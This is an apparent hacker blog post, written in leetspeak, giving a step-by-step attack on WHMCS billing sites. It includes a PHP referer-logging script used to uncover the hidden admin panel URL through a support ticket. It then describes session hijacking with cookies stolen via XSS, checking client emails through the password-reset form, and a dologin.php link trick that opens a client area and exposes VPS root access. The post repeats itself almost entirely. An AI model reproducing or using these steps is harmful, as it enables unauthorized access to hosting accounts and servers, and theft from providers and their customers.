How Are You Brother'z ?
Today ,,We're Going To Get Admin Panel Link OF WHMCS
We Need PHP File
This Code We Need .. Now Upload it For AnyServer And Just
Submit New Ticket In WHMCS To Support Admin And Send Link OF PHP File Like This You CAn Make Message
oke this message contains
http://site.tld/file.php
this is ouR coDe to inject oke now go to see URL.txt FIle
![[Image: Nup09644.png]](http://upload.traidnt.net/upfiles/Nup09644.png)
This Was The 1st Trick xP
The 2Nd Trick Is After XSS Codes ,, We Always Get Cookie But We See Firewall On Admin Panel
Like This
![[Image: gxj10095.png]](http://upload.traidnt.net/upfiles/gxj10095.png)
So Here We're
We Want To Bypass This Firewall And Get Root To X Client
Assume We've This Information
Cookiez
E-Mail OF Client
We Can Get Cookies From XSS / Xss-Shell <Browser Attack> Or Any HTML Injection That's Not Matter
E-Mail OF Client We Can Get it From WHo IS Service OF Domain / Target
Now We've To Check if The Email Address Is correct or incorrect
Request Reset Password
![[Image: Ked10893.png]](http://upload.traidnt.net/upfiles/Ked10893.png)
And Here Put E-Mail To Check
if you get message with E-Mail Sent ,, So E-Mail Address is Correct
![[Image: yM310980.png]](http://upload.traidnt.net/upfiles/yM310980.png)
E-Mail Is Correct # Zuhahah =))
Now We'll Put Cookies in Browser ,, I'm Using FireFox With FireBug/Fire Co()kie Addon
![[Image: nAZ11269.png]](http://upload.traidnt.net/upfiles/nAZ11269.png)
![[Image: f5T11298.png]](http://upload.traidnt.net/upfiles/f5T11298.png)
Create C00kie And Put As We've Then Type F5
And You'll Get iN The Top of Page
![[Image: eGO11421.png]](http://upload.traidnt.net/upfiles/eGO11421.png)
But The Problem Now We Can't Access Admin Panel
Because OF Fire Wall
Oke Our Magic Is found
Now Use This Link
http://site.tld/whmcs/dologin.php?u s e r n a m e=clients@gmail.com
Don't Use Spaces In u$ername But I Used Because OF Security
So You'll Be In ClientArea Now
![[Image: CZW12352.png]](http://upload.traidnt.net/upfiles/CZW12352.png)
Discover The Services And Product'z
![[Image: zUz12272.png]](http://upload.traidnt.net/upfiles/zUz12272.png)
It's VPS Go 2 View Detail'z
![[Image: 8ix12498.png]](http://upload.traidnt.net/upfiles/8ix12498.png)
Root Access Is ready =))
Just Say Zuhahahaha
Today ,,We're Going To Get Admin Panel Link OF WHMCS
We Need PHP File
PHP Code:
<?php
# Admin Link Finder Via XSS
# Don't Forget To Inject Code :)
# WWW.SEC4EVER.COM
#404
echo "404 Page Not Found";
$url = $_SERVER['HTTP_REFERER'];
$urlx = @fopen("URL.txt","w");
@fwrite($urlx,"======================================================================
URL/Admin Panel : $url
======================================================================
");
?>This Code We Need .. Now Upload it For AnyServer And Just
Submit New Ticket In WHMCS To Support Admin And Send Link OF PHP File Like This You CAn Make Message
Code:
Hello
I Need To Make Like This Site
http://site.tld/file.php
waiting support
thanks
H4x0roke this message contains
http://site.tld/file.php
this is ouR coDe to inject oke now go to see URL.txt FIle
This Was The 1st Trick xP
The 2Nd Trick Is After XSS Codes ,, We Always Get Cookie But We See Firewall On Admin Panel
Like This
So Here We're
We Want To Bypass This Firewall And Get Root To X Client
Assume We've This Information
Cookiez
Code:
PHPSESSID=34820c5cad7Da21205091c36b749D085E-Mail OF Client
Code:
clients@gmail.comWe Can Get Cookies From XSS / Xss-Shell <Browser Attack> Or Any HTML Injection
That's Not MatterE-Mail OF Client We Can Get it From WHo IS Service OF Domain / Target
Now We've To Check if The Email Address Is correct or incorrect
Request Reset Password
And Here Put E-Mail To Check
if you get message with E-Mail Sent ,, So E-Mail Address is Correct
E-Mail Is Correct
# Zuhahah =))Now We'll Put Cookies in Browser ,, I'm Using FireFox With FireBug/Fire Co()kie Addon
Create C00kie And Put As We've Then Type F5
And You'll Get iN The Top of Page
But The Problem Now We Can't Access Admin Panel
Because OF Fire WallOke Our Magic Is found
Now Use This Link
http://site.tld/whmcs/dologin.php?u s e r n a m e=clients@gmail.com
Don't Use Spaces In u$ername But I Used Because OF Security
So You'll Be In ClientArea Now
Discover The Services And Product'z
It's VPS
Go 2 View Detail'zRoot Access Is ready =))
Just Say Zuhahahaha
No comments:
Post a Comment